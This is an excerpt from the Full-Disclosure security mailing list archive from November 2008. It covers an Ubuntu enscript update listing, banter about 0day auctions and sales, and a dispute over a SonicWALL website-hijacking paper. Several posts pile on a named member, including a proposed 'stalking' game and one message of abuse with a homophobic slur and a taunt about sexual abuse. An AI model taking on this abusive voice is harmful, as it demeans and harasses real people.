      Size/MD5:  1036734 b5174b59e4a050fb462af5dbf28ebba3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-11ubuntu0.2_amd64.deb
      Size/MD5:   425468 5f020fcebfffb46ed32cc6ae50939972

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-11ubuntu0.2_i386.deb
      Size/MD5:   411500 3f7ebb92b6a87efce2ec18ad2cbed2d3

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/e/enscript/enscript_1.6.4-11ubuntu0.2_lpia.deb
      Size/MD5:   414372 3630143c4898a99a48a13bd5899f003c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-11ubuntu0.2_powerpc.deb
      Size/MD5:   424744 bbd80756d675ae285b7bfec9992fbc55

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-11ubuntu0.2_sparc.deb
      Size/MD5:   415382 f665b649a786296363e17fd6f560bb0f

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.04.1.diff.gz
      Size/MD5:    93119 62c2bd2cef254af68bd2fa0c7d1d36f3
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.04.1.dsc
      Size/MD5:      774 7cb02960688d0e9fb17f30bc7932577e
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4.orig.tar.gz
      Size/MD5:  1036734 b5174b59e4a050fb462af5dbf28ebba3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.04.1_amd64.deb
      Size/MD5:   425882 56b5c201eba9f4ccba832d9de0277b6a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.04.1_i386.deb
      Size/MD5:   412426 7e5bd9e9ed8d8a69e01f112ace8bf9d8

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.04.1_lpia.deb
      Size/MD5:   414800 6c3584e7ca1dc88917d3f24298cbd78b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.04.1_powerpc.deb
      Size/MD5:   426356 c9efe8d867bdcf618857c2eb6a140d6b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.04.1_sparc.deb
      Size/MD5:   415802 0d13cb614bbaefb045515c3ac223c5a6

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.10.1.diff.gz
      Size/MD5:    93116 0338194240bae030e8150e47ac40208d
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.10.1.dsc
      Size/MD5:     1188 ac3234ebd2b48790ac95d4d1baae83e8
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4.orig.tar.gz
      Size/MD5:  1036734 b5174b59e4a050fb462af5dbf28ebba3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.10.1_amd64.deb
      Size/MD5:   428584 64a869b979b5d62ff169b68e322ae43f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.10.1_i386.deb
      Size/MD5:   415574 25eb8ba34f468dd58a6ddf607d54e434

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.10.1_lpia.deb
      Size/MD5:   416772 9ec0d324ce07b50261acc2896618a46f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.10.1_powerpc.deb
      Size/MD5:   426934 5aa206fa2bee1d271672ce6041e8616b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/e/enscript/enscript_1.6.4-12ubuntu0.8.10.1_sparc.deb
      Size/MD5:   418004 97edf96856ff530d88075b3076cc037e

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 235 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/efb471ca/attachment.bin 

From elazar at hushmail.com  Tue Nov  4 01:38:40 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Mon, 03 Nov 2008 20:38:40 -0500
Subject: [Full-disclosure] Securing our computers?
Message-ID: <20081104013841.3CEA52003F@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Whats your poison of choice?

On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
<michael.boman at gmail.com> wrote:
>I already have a drinking game going, awarding myself a drink for
>every time n3td3v says something stupid, and every time I play it
>I
>run out of booze or blacks out... Dangerous stuff... If you are in
>my
>area we can play it together sometime...
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <vulcanius at gmail.com>
>wrote:
>> Actually I think a new game should be created that revolves
>around stalking
>> n3td3v. Points would be awarded for the quickest response to
>each of his
>> worthless posts. At the end of the month a Stalker of the Month
>could be
>> selected and given a prize. Bonus points could be given out for
>the most
>> degrading responses. I think it could be a lot of fun.
>>
>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <erc at pobox.com> wrote:
>>>
>>> Jesus ... you guys need to get back on your lithium...
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>--
>http://michaelboman.org - Security Blog & Wiki
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkPp6EACgkQi04xwClgpZjskAP/a3SMEtnpaW35KeMcKTkcmdo/Z5Dy
IEJUk9PkyTzne+6xHqJ6ZTmeD27yAUNQTIZ68QpJlK/mCtZg0nRcjovV3P5+9dn1LcQ3
myyVoHyuz12oReXEw872nsPfEs7DK5UuplIueTqGW5YaFMZ/4DVgjI9fCo0hp20WbvS8
0IwZ5mc=
=jTLZ
-----END PGP SIGNATURE-----

--
Click to book your dream cruise.
http://tagline.hushmail.com/fc/Ioyw6h4eRWxzOp9csQYGzT9hU7Y75tPc0M6V5WkxPwHVmL1MeGyEmE/



From Valdis.Kletnieks at vt.edu  Tue Nov  4 02:25:45 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 21:25:45 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: Your message of "Mon, 03 Nov 2008 18:00:30 EST."
	<f398fbb50811031500g5977b3bfi7b1aeea605eea849@mail.gmail.com>
References: <43a365c5$17e8ef99$d9ff1b0$@com>
	<6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
	<f398fbb50811031500g5977b3bfi7b1aeea605eea849@mail.gmail.com>
Message-ID: <112489.1225765545@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 18:00:30 EST, vulcanius said:

> Because n3td3v is paranoid and believes the government should run just about
> everything.

No, paranoid means you think the government already does run just about
everything, whether or not you think it should. :)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/51ef10f6/attachment.bin 

From vulcanius at gmail.com  Tue Nov  4 03:19:24 2008
From: vulcanius at gmail.com (vulcanius)
Date: Mon, 3 Nov 2008 22:19:24 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <112489.1225765545@turing-police.cc.vt.edu>
References: <43a365c5$17e8ef99$d9ff1b0$@com>
	<6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
	<f398fbb50811031500g5977b3bfi7b1aeea605eea849@mail.gmail.com>
	<112489.1225765545@turing-police.cc.vt.edu>
Message-ID: <f398fbb50811031919y4ff9cec7m9af62f041ac50980@mail.gmail.com>

Actually in the case of n3td3v I believe his paranoia is that everyone
_except_ the government is out to get him. Black hats, white hats, 83 year
old grandmothers, the lot of 'em. Remember now, according to himself he IS a
researcher exploring the seedy underbelly of the interwebs and it's
inhabitants, all of which apparently frequent security mailing lists.

On Mon, Nov 3, 2008 at 9:25 PM, <Valdis.Kletnieks at vt.edu> wrote:

> On Mon, 03 Nov 2008 18:00:30 EST, vulcanius said:
>
> > Because n3td3v is paranoid and believes the government should run just
> about
> > everything.
>
> No, paranoid means you think the government already does run just about
> everything, whether or not you think it should. :)
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/a113ebd5/attachment.html 

From Valdis.Kletnieks at vt.edu  Tue Nov  4 03:45:54 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 22:45:54 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: Your message of "Mon, 03 Nov 2008 22:19:24 EST."
	<f398fbb50811031919y4ff9cec7m9af62f041ac50980@mail.gmail.com>
References: <43a365c5$17e8ef99$d9ff1b0$@com>
	<6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
	<f398fbb50811031500g5977b3bfi7b1aeea605eea849@mail.gmail.com>
	<112489.1225765545@turing-police.cc.vt.edu>
	<f398fbb50811031919y4ff9cec7m9af62f041ac50980@mail.gmail.com>
Message-ID: <116308.1225770354@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 22:19:24 EST, vulcanius said:

> Actually in the case of n3td3v I believe his paranoia is that everyone
> _except_ the government is out to get him. Black hats, white hats, 83 year
> old grandmothers, the lot of 'em. Remember now, according to himself he IS a
> researcher exploring the seedy underbelly of the interwebs and it's
> inhabitants, all of which apparently frequent security mailing lists.

His list has 5,000 alleged people (quite probably a lot are actually sock puppets)

There's 600 million Internet users.

He's 599,995,000 users short.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/3c8cb4d8/attachment.bin 

From michael.boman at gmail.com  Tue Nov  4 05:17:17 2008
From: michael.boman at gmail.com (Michael Boman)
Date: Tue, 4 Nov 2008 06:17:17 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <20081104013841.3CEA52003F@smtp.hushmail.com>
References: <20081104013841.3CEA52003F@smtp.hushmail.com>
Message-ID: <48989dd70811032117wbbd7c40l5066c1559412a202@mail.gmail.com>

Beer and Whiskey, unless you have a good Russian vodka - the Swedish
ones ain't that good compared to the Russians.

Best regards
Michael Boman

On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <elazar at hushmail.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Whats your poison of choice?
>
> On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
> <michael.boman at gmail.com> wrote:
>>I already have a drinking game going, awarding myself a drink for
>>every time n3td3v says something stupid, and every time I play it
>>I
>>run out of booze or blacks out... Dangerous stuff... If you are in
>>my
>>area we can play it together sometime...
>>
>>Best regards
>>Michael Boman
>>
>>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <vulcanius at gmail.com>
>>wrote:
>>> Actually I think a new game should be created that revolves
>>around stalking
>>> n3td3v. Points would be awarded for the quickest response to
>>each of his
>>> worthless posts. At the end of the month a Stalker of the Month
>>could be
>>> selected and given a prize. Bonus points could be given out for
>>the most
>>> degrading responses. I think it could be a lot of fun.
>>>
>>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <erc at pobox.com> wrote:
>>>>
>>>> Jesus ... you guys need to get back on your lithium...
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>>--
>>http://michaelboman.org - Security Blog & Wiki
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Charset: UTF8
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQECAAYFAkkPp6EACgkQi04xwClgpZjskAP/a3SMEtnpaW35KeMcKTkcmdo/Z5Dy
> IEJUk9PkyTzne+6xHqJ6ZTmeD27yAUNQTIZ68QpJlK/mCtZg0nRcjovV3P5+9dn1LcQ3
> myyVoHyuz12oReXEw872nsPfEs7DK5UuplIueTqGW5YaFMZ/4DVgjI9fCo0hp20WbvS8
> 0IwZ5mc=
> =jTLZ
> -----END PGP SIGNATURE-----
>
> --
> Find precision scales that can weigh anything. Click now!
> http://tagline.hushmail.com/fc/Ioyw6h4dUuTd7dtWT7hv6q3aYswG8Qwo3mbsh76QpUCPJJNNuemryA/
>
>



-- 
http://michaelboman.org - Security Blog & Wiki



From biz.marqee at gmail.com  Tue Nov  4 06:26:23 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Tue, 4 Nov 2008 17:26:23 +1100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <a741a45f0811032225y6a97b28dk34adab20310a0ead@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<a741a45f0811032225y6a97b28dk34adab20310a0ead@mail.gmail.com>
Message-ID: <a741a45f0811032226l261ec1e0lb8929e21ed53444f@mail.gmail.com>

"so i suggest you don't fuck with n3td3v"
--SNIP--

LOL. What can you do? You dumb cunt, I'll fuck with you all day long until
you get the picture that no one gives a fuck what you say and everyone looks
forward to the day you expire. Why are you so incapable of grasping the fact
that no one cares about you at all and you are wasting your time? I guess
somewhere in your medicated head this incessant ranting is your BEST attempt
at bettering the world and, to be honest, you really fucking suck at it. The
rest of us are laughing at you. Laughing at you like the scared pussy that
you are. Scared of the real man.

Look at the 7 days without you - no one was asking "wheres n3td3v" were
they? No, everyone was enjoying the fact that you were in hospital having
the guards do reruns of your drunk uncles night time visits your bedroom.
That shit fucked you up for life didn't it, faggot?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081104/91576282/attachment.html 

From fergdawgster at gmail.com  Tue Nov  4 06:37:27 2008
From: fergdawgster at gmail.com (Paul Ferguson)
Date: Mon, 3 Nov 2008 22:37:27 -0800
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <a741a45f0811032226l261ec1e0lb8929e21ed53444f@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<a741a45f0811032225y6a97b28dk34adab20310a0ead@mail.gmail.com>
	<a741a45f0811032226l261ec1e0lb8929e21ed53444f@mail.gmail.com>
Message-ID: <6cd462c00811032237y3f6420b5r5d41ea70bfb89019@mail.gmail.com>

What's a n3td3v?

- ferg


On Mon, Nov 3, 2008 at 10:26 PM, Biz Marqee <biz.marqee at gmail.com> wrote:

> "so i suggest you don't fuck with n3td3v"
> --SNIP--


-- 
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/



From akl at experian.dk  Tue Nov  4 09:12:34 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:12:34 +0100
Subject: [Full-disclosure] Odays offers
In-Reply-To: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
	<6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>

Fuck the vendors put them on FD 

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Ureleet
Sent: 3. november 2008 20:24
To: anti security
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Odays offers

i haz an idea.  report them to the fucking vendors, like you are
supposed to you shitass. or to uscert.

or, heres an idea, fucking post them on FD.  Isnt' that what FD is for?

On Mon, Nov 3, 2008 at 6:36 AM, anti security <antisec.0day at gmail.com>
wrote:
> Dear people,
>
> I 'm proposing some really interesting 0days for Windows && Linux. 
> Please answer only by private email.
>
> See you soon
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From akl at experian.dk  Tue Nov  4 09:14:18 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:14:18 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <48989dd70811032117wbbd7c40l5066c1559412a202@mail.gmail.com>
References: <20081104013841.3CEA52003F@smtp.hushmail.com>
	<48989dd70811032117wbbd7c40l5066c1559412a202@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32494@PRO-EXCHANGESRV.experian.dk>

???? ????????! 

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Michael Boman
Sent: 4. november 2008 06:17
To: Elazar Broad
Cc: full-disclosure at lists.grok.org.uk; vulcanius at gmail.com
Subject: Re: [Full-disclosure] Securing our computers?

Beer and Whiskey, unless you have a good Russian vodka - the Swedish ones ain't that good compared to the Russians.

Best regards
Michael Boman

On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <elazar at hushmail.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Whats your poison of choice?
>
> On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman 
> <michael.boman at gmail.com> wrote:
>>I already have a drinking game going, awarding myself a drink for 
>>every time n3td3v says something stupid, and every time I play it I 
>>run out of booze or blacks out... Dangerous stuff... If you are in my 
>>area we can play it together sometime...
>>
>>Best regards
>>Michael Boman
>>
>>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <vulcanius at gmail.com>
>>wrote:
>>> Actually I think a new game should be created that revolves
>>around stalking
>>> n3td3v. Points would be awarded for the quickest response to
>>each of his
>>> worthless posts. At the end of the month a Stalker of the Month
>>could be
>>> selected and given a prize. Bonus points could be given out for
>>the most
>>> degrading responses. I think it could be a lot of fun.
>>>
>>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <erc at pobox.com> wrote:
>>>>
>>>> Jesus ... you guys need to get back on your lithium...
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>>--
>>http://michaelboman.org - Security Blog & Wiki
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Charset: UTF8
> Note: This signature can be verified at 
> https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQECAAYFAkkPp6EACgkQi04xwClgpZjskAP/a3SMEtnpaW35KeMcKTkcmdo/Z5Dy
> IEJUk9PkyTzne+6xHqJ6ZTmeD27yAUNQTIZ68QpJlK/mCtZg0nRcjovV3P5+9dn1LcQ3
> myyVoHyuz12oReXEw872nsPfEs7DK5UuplIueTqGW5YaFMZ/4DVgjI9fCo0hp20WbvS8
> 0IwZ5mc=
> =jTLZ
> -----END PGP SIGNATURE-----
>
> --
> Find precision scales that can weigh anything. Click now!
> http://tagline.hushmail.com/fc/Ioyw6h4dUuTd7dtWT7hv6q3aYswG8Qwo3mbsh76
> QpUCPJJNNuemryA/
>
>



--
http://michaelboman.org - Security Blog & Wiki

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From akl at experian.dk  Tue Nov  4 09:11:20 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:11:20 +0100
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <20081103184957.GB5218@mail.msys.ch>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com><4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
	<20081103184957.GB5218@mail.msys.ch>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32492@PRO-EXCHANGESRV.experian.dk>

Free 0day for all!! 

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Marc
Balmer
Sent: 3. november 2008 19:50
To: n3td3v
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be
outlawed?

* n3td3v wrote:
> ---------- Forwarded message ----------
> From: n3td3v <xploitable at gmail.com>
> Date: Mon, Nov 3, 2008 at 1:15 PM
> Subject: 0day auctions, should they be outlawed?
> To: n3td3v <n3td3v at googlegroups.com>
> 
> 
> i'll be lobbying soon to outlaw 0day auctions, this means the banning 
> of 0day sales on the internet. i've noticed an increased level in 0day

> sales lately on mailing lists, and web sites... i think this should be

> against the law. let me know what your opinions are on this, so i can 
> form what im going to say when i lobby people about it. cheers.

wrong approach.  there should be a law that the state has to buy all
0days and publish them here on undisclosure.  that would be good use of
tax money... ;)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From akl at experian.dk  Tue Nov  4 09:09:54 2008
From: akl at experian.dk (Anders Klixbull)
Date: Tue, 4 Nov 2008 10:09:54 +0100
Subject: [Full-disclosure] Universal Website Hijacking by Exploiting
	Firewall Content Filtering Features + SonicWALL firewalls 0day
In-Reply-To: <b7a807650810312004x68d081cfqa2f50af147567af@mail.gmail.com>
References: <b7a807650810301931r268db052o6ca83ac6a4a6ce40@mail.gmail.com>
	<5ae653bf0810310131s3cc5d21cm2aacdd2c60f8dc73@mail.gmail.com>
	<b7a807650810310717x73ab7d59sf9ffb496b3fb2799@mail.gmail.com>
	<5ae653bf0810311518u14272c60o19b133c3e288a529@mail.gmail.com>
	<b7a807650810312004x68d081cfqa2f50af147567af@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32491@PRO-EXCHANGESRV.experian.dk>

 
Shut up
-----Original Message-----
From: Adrian P [mailto:unknown.pentester at gmail.com] 
Sent: 1. november 2008 04:05
To: Fionnbharr
Cc: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Universal Website Hijacking by Exploiting
Firewall Content Filtering Features + SonicWALL firewalls 0day

Hi Fionnbharr,

Well, that's fair enough. tbh, I couldn't find older examples, but this
is one of the points of sending a post to the lists: other people can
review it and give feedback. I just sometimes wished people were more
constructive on FD.

Regarding the paper, well, it can be useful for people who want to find
a similar issue in their firewall/proxy appliances. Don't you think?

No need to call anyone names IMO. And please, why do people keep
attacking Kaminsky? He has greatly contributed to the infosec community
so please give him some credit!

Thanks for your email anyway. Perhaps, you could have expressed yourself
in a less aggressive/more constructive manner?

Regards,
ap.

On Fri, Oct 31, 2008 at 10:18 PM, Fionnbharr <thouth at gmail.com> wrote:
> Sure, this attack vector has been 'discovered' by lots of people in 
> the past, or even concurrently, thats my point. It doesn't merit a 
> whole paper on it. Not to mention you're getting on the FUD/Kaminsky 
> bandwagon when GNUtards release a statement like 'New technique to 
> universally hijack websites', trying to get some media attention for 
> something everyone else already knew.
>
> re: the bluecoat vuln, if you read my post I just said it was a recent

> (or as you might put it, *recent*) example of this type of 
> vulnerability. I've this sort of vuln myself with client software and 
> so has a number of other people I know. Glad to see the majority of 
> your email is completely irrelevant.
>
>
> 2008/11/1 Adrian P <unknown.pentester at gmail.com>:
>> Hello Fionnbharr,
>>
>> Please see my response to your comments in-line.
>>
>> On Fri, Oct 31, 2008 at 8:31 AM, Fionnbharr <thouth at gmail.com> wrote:
>>> This isn't new. It isn't even a technique.
>>>
>>> http://www.bluecoat.com/support/securityadvisories/icap_patience
>>>
>>> A very recent example of this kind of vulnerability. My god you 
>>> gnucitizen people are retarded. At least you didn't give it a 
>>> ridiculous name like 'clickjacking'. Can you GNUtards please keep 
>>> your 'research' into subjects people already know to yourself or at 
>>> least not post it the lists, then at least I won't have to see it.
>>
>> That Bluecoat advisory was released on 29 September 2008. What makes 
>> you think that I did not discover the SonicWALL vulnerability/vector 
>> and reported it to ZDI *way before* that date? Well, FYI I reported 
>> it to ZDI in June 2008 and discovered it even before.
>>
>> At least, you should consider the possibility of the attack vector 
>> being discovered by two researchers concurrently. It can take quite a

>> few months before the vendor provides a patch, not to mention that 
>> SonicWALL was VERY slow to confirm the vulnerability.
>>
>> Don't you know that responsible disclosure means that the details of 
>> a vulnerability can be held for quite a while before being released 
>> to the public? Since when the publishing date of an advisory is equal

>> to discovery date?
>>
>> Furthermore, it appears that Bluecoat only released their advisory
>> *after* the researcher jplopezy made his advisory public, which could

>> suggest that he did NOT inform the vendor before releasing the
>> details:
>>
>> http://www.securityfocus.com/archive/1/496940/30/0/threaded
>>
>> It's also interesting that the researcher released the advisory 
>> (bugtraq post) one day *after* I published the general description of

>> the attack:
>>
>> June 25th, 2008.
>> ZDI forwards my findings to SonicWALL (see "Disclosure Timeline"):
>> http://www.zerodayinitiative.com/advisories/ZDI-08-070/
>>
>> September 20th, 2008.
>> I publish the general description of the attack:
>> http://www.gnucitizen.org/blog/new-technique-to-perform-universal-web
>> site-hijacking/
>>
>> September 21th, 2008.
>> Researcher jplopezy finds the same attack vector on BlueCoat's web
filter:
>> http://www.securityfocus.com/archive/1/496577/30/0/threaded
>>
>> Notice jplopezy published the bugtraq post *one day after* I 
>> published the general attack description on GNUCITIZEN. Interesting?
>>
>> Please do your homework before many any accusations.
>>
>>>
>>> Also "Malaysia: Cracking into Embedded Devices and Beyond!", who the

>>> fuck uses the word 'cracking' instead of 'hacking' in 2008? Sure for

>>> cracking passwords, but wow.
>>
>> Can't you accept the idea some some of us still consider hacking and 
>> breaking into a system not necessarily the same thing?
>>
>> Regards,
>> ap.
>>
>>>
>>> 2008/10/31 Adrian P <unknown.pentester at gmail.com>:
>>>> Hello folks,
>>>>
>>>> Yesterday, I presented for the first time [1] a new method to 
>>>> perform universal website hijacking by exploiting content filtering

>>>> features commonly supported by corporate firewalls. I briefly 
>>>> discussed [2] the finding on GNUCITIZEN in the past without giving 
>>>> away the details, but rather mentioning what the attacker can do 
>>>> and some characteristics of the attack.
>>>>
>>>> Anyway, I'm now releasing full details on how the technique works, 
>>>> and a real 0day example against SonicWALL firewalls.
>>>>
>>>> The paper can be found on the GNUCITIZEN labs site. Please let me 
>>>> know if you can successfully use the same technique against 
>>>> firewalls by other vendors:
>>>>
>>>> http://sites.google.com/a/gnucitizen.org/lab/research-papers
>>>>
>>>> Finally, I'd like to thank Zero Day Initiative [3] for their great 
>>>> work and the Hack in the Box crew for organizing such a fine event!
>>>>
>>>> Regards,
>>>> ap.
>>>>
>>>> REFERENCES
>>>>
>>>> [1] "HITBSecConf2008 - Malaysia: Cracking into Embedded Devices and
Beyond!"
>>>> http://conference.hackinthebox.org/hitbsecconf2008kl/?page_id=186
>>>>
>>>> [2] "New technique to perform universal website hijacking"
